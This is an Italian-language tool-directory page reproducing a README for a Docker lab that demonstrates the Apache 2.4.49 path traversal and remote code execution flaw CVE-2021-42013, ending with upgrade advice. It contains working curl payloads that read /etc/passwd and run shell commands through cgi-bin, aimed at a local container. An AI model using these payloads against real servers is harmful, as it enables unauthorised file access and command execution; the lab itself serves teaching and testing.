Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
apache-cve-2021-42013-lab — Laboratorio che dimostra la vulnerabilità di Apache HTTP Server 2.4.49 (CVE-2021-42013) in ambiente Docker. | Kitploit
Strumenti/GitHubGitHub/berraesen/apache-cve-2021-42013-lab
Sicurezza dei ContenitoriAnalisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebApprendimento e FormazioneLab e Pratica
GitHubberraesen/apache-cve-2021-42013-lab

apache-cve-2021-42013-lab

Laboratorio che dimostra la vulnerabilità di Apache HTTP Server 2.4.49 (CVE-2021-42013) in ambiente Docker.

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi
Vedi Repository
1 mese faNon ancora revisionato

Apache HTTP Server 2.4.49 Path Traversal & Remote Code Execution (CVE-2021-42013)

Informazioni sul Progetto

In questo progetto ho dimostrato la vulnerabilità CVE-2021-42013 presente in Apache HTTP Server versione 2.4.49 in un ambiente di laboratorio creato con Docker.

L'obiettivo è esaminare in un ambiente controllato come si manifesta la vulnerabilità, come funziona e quali effetti ha sul sistema.

Questo lavoro è stato realizzato esclusivamente a scopo didattico e di laboratorio.

Tecnologie Utilizzate

  • Docker
  • Ubuntu 22.04
  • Apache HTTP Server 2.4.49
  • Bash
  • curl

Struttura dei File del Progetto

root@kitploit:~
.
├── Dockerfile
├── index.html
└── README.md

Requisiti

Prima di eseguire il progetto, è necessario avere installati i seguenti componenti.

  • Docker Desktop
  • Git (facoltativo)

Installazione

Innanzitutto, scarica la repository sul tuo computer.

root@kitploit:~
git clone https://github.com/berraesen/apache-cve-2021-42013-lab.git

Entra nella cartella.

root@kitploit:~
cd apache-cve-2021-42013-lab

Crea l'immagine Docker.

root@kitploit:~
docker build -t apache-2.4.49-src .

Avvia il container.

root@kitploit:~
docker run -d -p 8081:80 --name apache-src apache-2.4.49-src

Entra nel container.

root@kitploit:~
docker exec -it apache-src /bin/bash

Verifica la versione di Apache.

root@kitploit:~
/usr/local/apache2/bin/httpd -v

Per uscire dal container:

root@kitploit:~
exit

Verifica dei Moduli Apache

Puoi verificare se il modulo CGI è attivo con il seguente comando.

root@kitploit:~
docker exec -it apache-src /usr/local/apache2/bin/apachectl -M

Attivazione del Modulo CGI

root@kitploit:~
docker exec -it apache-src sed -i 's/#LoadModule cgid_module/LoadModule cgid_module/g' /usr/local/apache2/conf/httpd.conf

Successivamente, riavvia Apache.

root@kitploit:~
docker exec -it apache-src /usr/local/apache2/bin/apachectl restart

Per disattivare il modulo CGI:

root@kitploit:~
docker exec -it apache-src sed -i 's/LoadModule cgid_module/#LoadModule cgid_module/g' /usr/local/apache2/conf/httpd.conf

Quindi riavvialo di nuovo.

Test della Vulnerabilità

Path Traversal

root@kitploit:~
curl.exe -v --path-as-is "http://localhost:8081/cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/etc/passwd"

Remote Code Execution

root@kitploit:~
curl.exe -v --path-as-is "http://localhost:8081/cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/bin/sh" --data "echo; id"

Per visualizzare maggiori informazioni sul sistema:

root@kitploit:~
curl.exe -s --path-as-is "http://localhost:8081/cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/bin/sh" --data "echo; id; uname -a; whoami" -o -

Risultato Atteso

Dopo aver completato l'installazione:

  • Apache 2.4.49 dovrebbe funzionare correttamente.
  • Quando il modulo CGI è attivo, la vulnerabilità può essere osservata.
  • È possibile dimostrare l'accesso ai file di sistema tramite Path Traversal.
  • Si può osservare che è possibile eseguire comandi sul server tramite RCE.

Principio di Funzionamento della Vulnerabilità

root@kitploit:~
İstemci (cURL)
      │
      ▼
Apache HTTP Server 2.4.49
      │
      ▼
URL Normalization Hatası
      │
      ▼
Path Traversal
      │
      ├──────────────► CGI Kapalı
      │                     │
      │                     ▼
      │             Dosya erişimi mümkün olabilir
      │
      ▼
CGI Aktif
      │
      ▼
/bin/sh çalıştırılabilir
      │
      ▼
Remote Code Execution (RCE)

Per poter dimostrare lo scenario RCE, è necessario attivare il modulo mod_cgi.

Prevenzione

Per eliminare questa vulnerabilità, si consiglia di aggiornare Apache HTTP Server alla versione 2.4.51 o successiva. Inoltre, se CGI non viene utilizzato, si raccomanda di disattivarlo e di definire permessi di accesso appropriati solo per le directory necessarie.

Scarica lo strumento